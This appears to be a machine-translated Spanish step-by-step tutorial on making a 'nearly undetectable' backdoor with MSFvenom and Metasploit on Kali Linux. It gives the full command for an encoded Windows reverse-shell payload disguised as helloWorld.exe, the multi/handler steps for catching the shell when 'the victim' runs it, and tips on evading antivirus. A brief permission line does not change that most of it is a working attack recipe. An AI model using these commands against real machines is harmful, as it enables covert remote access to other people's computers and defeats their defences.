Cómo crear una puerta trasera casi indetectable usando MSFvenom en Kali Linux

Tabla de contenido:

Cómo crear una puerta trasera casi indetectable usando MSFvenom en Kali Linux
Cómo crear una puerta trasera casi indetectable usando MSFvenom en Kali Linux

Video: Cómo crear una puerta trasera casi indetectable usando MSFvenom en Kali Linux

Video: Cómo crear una puerta trasera casi indetectable usando MSFvenom en Kali Linux
Video: COMO ATACAR CON GOWIPE TH8 2020. EL REY DEL GOWIPE ESTA AQUI. 2024, Abril
Anonim

Se utiliza una puerta trasera para eludir los mecanismos de seguridad, a menudo de forma secreta y, en su mayoría, de forma indetectable. Usando MSFvenom, la combinación de msfpayload y msfencode, es posible crear una puerta trasera que se conecte de nuevo al atacante usando TCP de shell inverso. Para desarrollar una puerta trasera, debe cambiar la firma de su malware para evadir cualquier software antivirus. Complete este proyecto en un par de computadoras a las que tenga permiso de acceso y, en el proceso, aprenderá más sobre la seguridad informática y cómo funciona este tipo de puerta trasera.

Pasos

Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 1
Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 1

Paso 1. Inicie Kali y encienda la consola Terminal

Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 2
Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 2

Paso 2. Escriba ifconfig para mostrar la interfaz y verifique su dirección IP

Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 3
Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 3

Paso 3. Escriba codificadores msfvenom -l para mostrar la lista de codificadores

Utilizará x86 / shikata_ga_nai como codificador

Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 4
Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 4

Paso 4. Escriba "msfvenom -a x86 --platform windows -p windows / shell / reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86 / shikata_ga_nai -f exe> helloWorld.exe

  • -a x86: la plataforma Windows designa la arquitectura que se utilizará.
  • -p windows / shell / reverse_tcp designa las cargas útiles para incrustar.
  • LHOST designa la dirección IP del oyente.
  • LPORT designa el puerto de escucha.
  • -b "\ x00" designa para evitar caracteres incorrectos (bytes nulos).
  • -e x86 / shikata_ga_nai designa el nombre del codificador.
  • -f exe> helloWorld.exe designa la salida de formato.
Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 5
Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 5

Paso 5. Escriba msfconsole para activar Metasploit

Ahora ha generado su puerta trasera. Cuando la víctima haga clic en helloWorld.exe, la carga útil de shell que está incrustada se activará y se conectará de nuevo a su sistema. Para recibir la conexión, debe abrir el controlador múltiple en Metasploit y configurar las cargas útiles

Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 6
Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 6

Paso 6. Escriba use exploit / multi / handler

Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 7
Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 7

Paso 7. Escriba set payload windows / shell / reverse_tcp

Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 8
Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 8

Paso 8. Escriba show options para verificar el módulo

Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 9
Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 9

Paso 9. Escriba set LHOST 192.168.48.129

"LHOST" designa la dirección IP del oyente

Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 10
Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 10

Paso 10. Escriba set LPORT 4444

"LPORT" designa el puerto de escucha

Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 11
Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 11

Paso 11. Escriba ejecutar y espere la conexión de la máquina de la víctima

Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 12
Cree una puerta trasera casi indetectable usando MSFvenom en Kali Linux Paso 12

Paso 12. Espere a que la víctima haga clic en helloWorld.exe

Entonces se conectará con éxito a la máquina de la víctima.

Consejos

  • El uso de -i en MSFvenom representará las iteraciones de la codificación. A veces, más iteraciones pueden ayudar a evadir el software AV.
  • Ha aprendido cómo generar la puerta trasera y codificar utilizando MSFvenom, pero este método no funcionará perfectamente con algunos de los programas de software AV de hoy en día. La razón detrás de esto se debe a las plantillas de ejecución en MSFvenom. Los proveedores de AV han agregado la firma estática de estas plantillas y simplemente búsquenlas. La solución para este problema es utilizar una plantilla de ejecución diferente o herramientas diferentes.

Recomendado: